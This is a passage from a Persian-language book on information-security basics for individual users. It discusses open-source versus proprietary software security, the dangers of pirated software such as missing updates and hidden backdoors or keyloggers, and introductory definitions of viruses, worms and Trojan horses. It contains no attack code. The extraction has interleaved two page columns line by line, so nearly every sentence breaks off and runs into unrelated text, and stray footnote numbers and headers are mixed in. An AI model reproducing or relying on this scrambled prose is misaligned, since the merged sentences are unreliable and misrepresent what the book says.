ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﺎﺳﺒﻲ ﻣـﻮﺭﺩ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ .ﺩﺭ
ﭼﻮﻥ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺩﺭ ﻣﻨـﺎﻃﻖ ﻣﺨﺘﻠـﻒ ﻭ ﺑـﺪﻭﻥ ﺭﻭﺍﺑـﻂ • ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺎ ﺍﻳﻨﻜﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻋﺮﺿـﻪ
ﺳﺎﺯﻣﺎﻧﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻣﺤـﺼﻮﻻﺕ ﻣـﺘﻦﺑـﺎﺯ ﻛـﺎﺭ ﻣﻲ ﺷﻮﺩ ﺍﻣﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻳﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﻛﻨﻨﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ ﻭ ﺁﻥ ﻫﺰﻳﻨﻪﺑﺮ ﺑﺎﺷﺪ .ﻧﺴﺨﺔ ﺭﺍﻳﮕـﺎﻥ Red Hat Linuxﻛـﻪ ﺩﺭ
ﻓﻘــﺪﺍﻥ ﻳﻜﭙــﺎﺭﭼﮕﻲ ﺩﺭ ﺍﺟــﺰﺍﻱ ﻣﺨﺘﻠــﻒ ﻣﻨﺠــﺮ ﺑــﻪ ﺩﺳﺘﺮﺱ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻧﻤﻮﻧـﺔ ﺧـﻮﺑﻲ ﺍﺯ ﺍﻳـﻦ ﻗﺒﻴـﻞ
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﮔﺮﺩﺩ. ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺍﺳﺖ .ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻮﺍﻫـﺎﻥ ﺳـﻄﺢ ﺑﻴـﺸﺘﺮﻱ ﺍﺯ
ﺑﻪ ﺍﻳﻦ ﺩﻟﻴﻞ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻪ • ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺻﻠﻲ ﻭ ﻳﺎ
ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﻩ ﻭﺟــﻪ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ،ﺩﺳــﺘﻮﺭﺍﺕ ﺍﻭ ﺭﺍ ﺩﻧﺒــﺎﻝ ﺣﺪﺍﻗﻞ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﺮﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻨﺪ .ﺍﮔـﺮ ﺗـﺼﻤﻴﻢ ﺑـﻪ
ﻣــﻲﻛﻨﻨــﺪ ﻭ ﺍﻧﺠــﺎﻡ ﺍﻳﻨﻜــﺎﺭ ﺑﺎﻋــﺚ ﻣــﻲﺷــﻮﺩ ﻛﻴﻔﻴــﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺩﺍﺭﻳـﺪ ﻛـﻪ ﺧﺮﻳـﺪ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬـﺎ
ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺎﻻ ﺑﺎﺷﺪ. ﺭﺍﻳﮕﺎﻥ ﺍﺳـﺖ )ﻣﺜـﻞ ﺑﻌـﻀﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣـﺘﻦﺑـﺎﺯ( ﺗﻮﺟـﻪ
ﺩﺍﺷﺘﻪﺑﺎﺷﻴﺪ ﻛﻪ ﻣـﺪﺕﺯﻣـﺎﻥ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻧـﺴﺨﻪﻫـﺎﻱ
ﺍﺯ ﺁﻧﺠــﺎ ﻛــﻪ ﻫــﻴﭻ ﻣﻨﺒــﻊ ﻣﻌﻴﻨــﻲ ﻣــﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﻗﺒــﺎﻝ •
ﺍﺻــﻼﺣﻲ ﺁﻧﻬــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻛﻮﺗــﺎﻩ ﺑﺎﺷــﺪ .ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﮔــﺮ
ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺑﺮ ﻋﻬﺪﻩ ﻧﺪﺍﺭﺩ ،ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺍﻣﻨﻴـﺖ ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻳــﺎ ﺯﻳﺮﺳﻴــﺴﺘﻤﻬﺎﻱ ﻣﻬــﻢ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻧــﻮﻉ
ﺑﺮﺍﻱ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﺍﻧﻔـﺮﺍﺩﻱ ﺍﻫﻤﻴـﺖ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ، ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ
ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛـﻪ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺁﻧﺮﺍ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ )ﻣﺜ ﹰﻼ ﺩﺭ ﻫﺮ ﺷﺶ ﻣﺎﻩ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ.
ﺷﻮﺩ.
ﺭﻭﻧــﺪ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺕ ﻣــﺘﻦﺑــﺎﺯ ﺑــﺴﻴﺎﺭ ﻣــﺸﻜﻠﺘﺮ ﺍﺯ
ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻣﻌﺘﻘﺪﻧﺪ: ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺗﻲ ﻣﺜــﻞ Microsoft Windows
ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺎ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﺎﺭ • ﺍﺳﺖ؛ ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻧـﺼﺐ ﺑـﺮﺍﻱ ﻣﺤـﺼﻮﻻﺕ
ﻣﻲﻛﻨﻨﺪ ،ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺁﻧﻬـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﺧﺒـﺮﻩ ﺍﺻﻠﻲ ﻣﺘﻦﺑﺎﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ﻫﻢ ﺑﺮﻃﺮﻑ ﻣﻲﺷﻮﺩ .ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﺮﻳﻌﹰﺎ ﺍﺻﻼﺡ ﻣﻲﮔﺮﺩﺩ. ﻣﺘﻦﺑﺎﺯ ﻣﺒﺘﻨﻲ ﺑﺮ Windowsﻧﻴﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ
ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﺼﺐﻛﻨﻨﺪﻩﻫﺎﻱ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ •
ﻣﻲﻛﻨﻨﺪ.
ﺍﺳﺖ ﻛﺪ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻱ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﮔﺮ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ
ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺍﺭﺯﺵ ﺧﺎﺻـﻲ ﻗﺎﺋـﻞ ﻧـﺸﺪﻩ ﻫﻤﺎﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ،Windowsﺑﺴﺘﻪ ﻫـﺎﻱ ﺑـﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ
ﺑﺎﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﻣﻄﻠﻮﺑﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻭﺻﻠﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺑﺰﺭﮒ ،ﺑﺴﺘﻪ ﺑـﻪ
ﺑﺎﺷﺪ. ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ .ﺷﻨﺎﺳﺎﻳﻲ ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ
ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻤﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺯﻣﺎﻥ download
ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ •
ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ.
ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺤﺼﻮﻝ ﻣﺮﺍﺟﻌﻪ ﻛﺮﺩ ﻭ ﺍﻳـﻦ
ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺯﻣﺎﻧﻲ ﺯﻳﺎﺩﻱ ﺷﻮﺩ.
34 Open Source Software
٦٩ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
٣٥
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ
ﻧﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻭ ﻧﻪ ﻧﺎﺷﺮﺍﻥ ﺍﻳﻦ ﻛﺘﺎﺏ ﻫﻴﭽﻜﺪﺍﻡ ﻣﺮﻭﺝ ﺳـﺮﻗﺖ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺳﺎﺩﻩﺍﻧﮕﺎﺭﺍﻧـﻪ ﺍﺳـﺖ ﺍﮔـﺮ ﻭﺍﻧﻤـﻮﺩ ﻛﻨـﻴﻢ
ﭼﻨﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﺳﺮﻗﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺸﻜﻠﻲ ﺍﺳﺖ ﻛـﻪ
ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭﻟـﻲ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﺍﺗﻔـﺎﻕ
ﻣﻲﺍﻓﺘﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﻫﺰﻳﻨﺔ ﻧﺴﺒﻲ ﺗﻬﻴﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﻗـﺎﻧﻮﻧﻲ ﺩﺭ
ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﺩﺳﺘﻤﺰﺩﻫﺎ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﻛـﺸﻮﺭﻫﺎﻱ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ
ﺍﺳﺖ -ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺩﻭﺍﻳﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺤﻠﻲ ﻭ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﺑـﺎ
ﻫﻤﻜﺎﺭﻱ ﻫﻢ ﺍﻧﺠﺎﻡ ﺗﺨﻠﻔﺎﺕ ﺭﺍ ﺑﺴﻴﺎﺭ ﻏﻴﺮ ﻣﺤﺘﻤﻞ ﻣﻲﺳﺎﺯﻧﺪ.
ﮔﺬﺷﺘﻪ ﺍﺯ ﻭﻇﻴﻔﺔ ﻗﺎﻧﻮﻧﻲ ﻣﺴﺌﻮﻟﻴﻦ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺧﺪﺷـﻪﺩﺍﺭ
ﺷﺪﻥ ﺣﻘﻮﻕ ﻣﺎﻟﻜﻴﺖ ﺳﺎﺯﻧﺪﺓ ﻣﺤﺼﻮﻝ ،ﺩﻭ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻣﻨﻴﺖ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ.
ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺩﻭ ﻣﻮﺭﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺴﺮﻭﻗﻪ ﭼﻨﺪﺍﻥ ﺭﺍﻳﺞ
ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻫﺮ ﺩﻭ ﺑﺎ ﻫـﻢ
ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ ﻗﺎﺑﻞ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺷـﺪﻥ .۱
ﻧﺒﺎﺷﺪ ﻳﺎ ﺍﻧﺠﺎﻡ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺍﺯ ﻛﺎﺭ ﺑﻴﻨﺪﺍﺯﺩ.
ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻫـﺎﻱ ﻣـﺴﺮﻭﻗﻪ ﺣـﺎﻭﻱ .۲
ﻛﺎﺭﻛﺮﺩﻫــﺎﻳﻲ ﺑﺎﺷــﻨﺪ ﻛــﻪ ﺍﻧﺘﻈــﺎﺭ ﺁﻧﻬــﺎ ﺭﺍ ﻧﺪﺍﺭﻳــﺪ .ﺍﻳــﻦ
ﻛﺎﺭﻛﺮﺩﻫــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺷــﺎﻣﻞ ﺩﺭﺑﻬــﺎﻱ ﻣﺨﻔــﻲ،
ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﺻﻔﺤﻪﻛﻠﻴﺪ ،ﻳﺎ ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﻣﺨﺮﺏ ﺑﺎﺷﻨﺪ.
ﺍﻧﺠﺎﻡ ﺩﻫﺪ.
ﻛﻠﻴﺎﺕ
ﻛﺮﻣﻬﺎ ﺍﺯ ﺍﻳﻦ ﺟﻬﺖ ﻛﻪ ﻧـﺴﺨﻪﺍﻱ ﺍﺯ ﺧـﻮﺩ ﺭﺍ ﻛﺮﻡ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﻣﻔﻬﻮﻡ ﻭ ﺍﻧﻮﺍﻉ ﻣﺨﺘﻠﻒ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ )ﻧﻈﻴﺮ
ﺗﻜﺮﺍﺭ ﻣﻲﻛﻨﻨﺪ ﻣﺸﺎﺑﻪ ﻭﻳﺮﻭﺳـﻬﺎ ﻫـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭﻳﺮﻭﺳﻬﺎ ،ﻛﺮﻡﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ،ﻭ ﺗﺮﺍﻭﺍﻫـﺎ( ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ
ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﺑﻪ ﺑﺮﻧﺎﻣـﺔ ﻣﻴﺰﺑـﺎﻥ ﻧﻴـﺎﺯ ﻧﺪﺍﺭﻧـﺪ. ﺗﻮﺯﻳﻊ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ.
ﻫﻤﺎﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎ ،ﻳﻚ ﻛﺮﻡ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻨﻬـﺎ
ﻧﺴﺨﻪﻫـﺎﻳﻲ ﺍﺯ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﺟﺎﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﻣﻘﺪﻣﻪ
ﺗﻜﺮﺍﺭ ﻛﻨﺪ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻋـﻼﻭﻩ ﺑـﺮ ﺁﻥ ﻋﻤﻠﻴـﺎﺕ ٣٦
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ
ﺩﻳﮕﺮﻱ ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﺩﻫﺪ .ﻛﺮﻡ ﺗﻨﻬﺎ ﺯﻣـﺎﻧﻲ ﻛـﺎﺭ
ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺳﻴﺴﺘﻢ ﻗﺎﺑﻠﻴـﺖ ﭘـﺬﻳﺮﻓﺘﻦ ﻣﻨـﺎﺑﻊ ﻋﻼﻣﺖ ﺍﺧﺘﺼﺎﺭﻱ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑـﺪﺍﻓﺰﺍﺭ ٣٧ﺍﺳـﺖ .ﺍﻳـﻦ
ﺧﺎﺭﺟﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻥ ﻣﻨـﺎﺑﻊ ﻻ ﺑﺮﺍﻱ ﺁﺳﻴﺐ ﺭﺳﺎﻧﺪﻥ ﻳﺎ ﺧﺮﺍﺏ ﻛﺮﺩﻥ ﺳﻴﺴﺘﻢ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺑﺘﻮﺍﻧﺪ ﺑـﻪ ﺍﺟـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪ ﺑﭙـﺮﺩﺍﺯﺩ .ﺑﺮﺧـﻲ ﺍﺯ ﻃﺮﺍﺣﻲ ﻣﻲﺷﻮﻧﺪ.
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﺑـﺪﺍﻓﺰﺍﺭﻫﺎ، ﺍﻭﻟﻴﻦ ﻭﻳﺮﻭﺱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺩﺭ ﺳﺎﻝ ۱۹۸۱ﺷﻨﺎﺳﺎﻳﻲ ﺷـﺪ .ﻣﻔﻬـﻮﻡ
ﻛﺮﻡ ﺭﺍ ﻧﻴﺰ ﻧﻮﻋﻲ ﻭﻳﺮﻭﺱ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻭﺭﻧﺪ. ﻛــﺮﻡ ﺭﺍﻳﺎﻧــﻪﺍﻱ ٣٨ﺩﺭ ﻛﺘــﺎﺏ " "Science Fictionﺩﺭ ﺳــﺎﻝ
۱۹۷۵ﻣﻌﺮﻓﻲ ﺷﺪ ﻭ ﺍﻭﻟﻴﻦ ﻓﻌﺎﻟﻴﺖ ﻭﺍﻗﻌﻲ ﺁﻥ ﻣﺮﺑﻮﻁ ﺑـﻪ ﺍﻭﺍﻳـﻞ
ﻧﺎﻡ ﺍﻳﻦ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺯ ﺍﻓـﺴﺎﻧﺔ ﺟﻨـﮓ ﺷـﻬﺮ ﺍﺳﺐ ﺗﺮﺍﻭﺍ ﺩﻫﺔ ۱۹۸۰ﺍﺳﺖ .ﺟﺎﻟﺐ ﺍﺳﺖ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﻳﻦ ﻛﺮﻣﻬﺎ ﺍﻭﻟـﻴﻦ ﺑـﺎﺭ
ﺗﺮﺍﻭﺍ ﺩﺭ ﻳﻮﻧـﺎﻥ ﺑﺮﮔﺮﻓﺘـﻪ ﺷـﺪﻩ ﺍﺳـﺖ .ﺩﺭ ﺁﻥ ﺑﺮﺍﻱ ﺍﻳﻦ ﻃﺮﺍﺣﻲ ﺷـﺪﻧﺪ ﻛـﻪ ﻋﻤﻠﻜـﺮﺩ ﻣﺜﺒـﺖ ﻭ ﻣﻔﻴـﺪ ﺩﺍﺷـﺘﻪ
ﺍﻓﺴﺎﻧﻪ ،ﻳﻮﻧﺎﻧﻲﻫﺎ ﻳﻚ ﺍﺳﺐ ﭼﻮﺑﻲ ﺑﺰﺭﮒ ﺭﺍ ﺍﺯ ﺑﺎﺷﻨﺪ .ﭘﻴـﺪﺍﻳﺶ ﺍﺳـﺒﻬﺎﻱ ﺗـﺮﺍﻭﺍﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ٣٩ﻫـﻢ ﺑـﻪ ﺍﻭﻟـﻴﻦ
ﺩﺭﻭﺍﺯﺓ ﺷﻬﺮ ﺑﻪ ﺩﺍﺧﻞ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺭﻭﺯﻫﺎﻱ ﺍﺷﺘﺮﺍﻙ ﺯﻣﺎﻧﻲ )ﺩﻫﺔ (۱۹۶۰ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ .ﻋﻠﻴﺮﻏﻢ ﺗﺎﺭﻳﺦ
ﺍﺳﺐ ﻭﺍﺭﺩ ﺷﻬﺮ ﻣﻲﺷﻮﺩ ﺗﻌﺪﺍﺩ ﺯﻳـﺎﺩﻱ ﺳـﺮﺑﺎﺯ ﻭ ﺳﺎﺑﻘﺔ ﻃﻮﻻﻧﻲ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ،ﺩﺭ ﺳـﺎﻟﻬﺎﻱ ﺍﺧﻴـﺮ ﺍﺳـﺖ ﻛـﻪ
ﻳﻮﻧﺎﻧﻲ ﺍﺯ ﺁﻥ ﺧﺎﺭﺝ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﺷـﻬﺮ ﺭﺍ ﺑـﻪ ﺗﺄﺛﻴﺮﺍﺕ ﻣﺨﺮﺏ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻋـﺎﺩﻱ ﺷـﺪﻳﺪ ﻭ ﺧﻄﺮﻧـﺎﻙ
ﺗﺼﺮﻑ ﺧﻮﺩ ﺩﺭ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﺯ ﺁﻥ ﺯﻣﺎﻥ ﺑﻪ ﺑﻌـﺪ ﺷﺪﻩ ﺍﺳﺖ.
"ﺍﺳﺐ ﺗـﺮﺍﻭﺍ" ﺑـﻪ ﻣﻌﻨـﺎﻱ ﭼﻴـﺰﻱ ﺍﺳـﺖ ﻛـﻪ
ﺩﺭ ﺁﻏﺎﺯ ﺑﺎﻳﺪ ﻣﻌﻨﺎ ﻭ ﻣﻔﻬﻮﻡ ﺍﻳﻦ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻴﻢ.
ﻇﺎﻫﺮﻱ ﻋﺎﺩﻱ ﺍﻣﺎ ﻣﺤﺘﻮﻳﺎﺗﻲ ﺧﻄﺮﻧﺎﻙ ﺩﺍﺭﺩ.
ﺩﺭ ﻣﻔﺎﻫﻴﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ،ﺍﺳـﺐ ﺗـﺮﺍﻭﺍ ﻣـﻲﺗﻮﺍﻧـﺪ ﻭﻳﺮﻭﺱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺍﻧﺘﻬﺎﻱ ﺑﺮﻧﺎﻣـﺔ ﻭﻳﺮﻭﺱ
ﺧﺮﺍﺑﻴﻬﺎﻱ ﺯﻳﺎﺩﻱ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ ﻭ ﻳﺎ ﺍﻋﻤﺎﻟﻲ ﻏﻴﺮ ﺩﻳﮕﺮ ﻣﺘﺼﻞ ﻣـﻲﺷـﻮﺩ ﻭ ﻳـﺎ ﻭﺍﺭﺩ ﺑﺪﻧـﺔ ﻳـﻚ
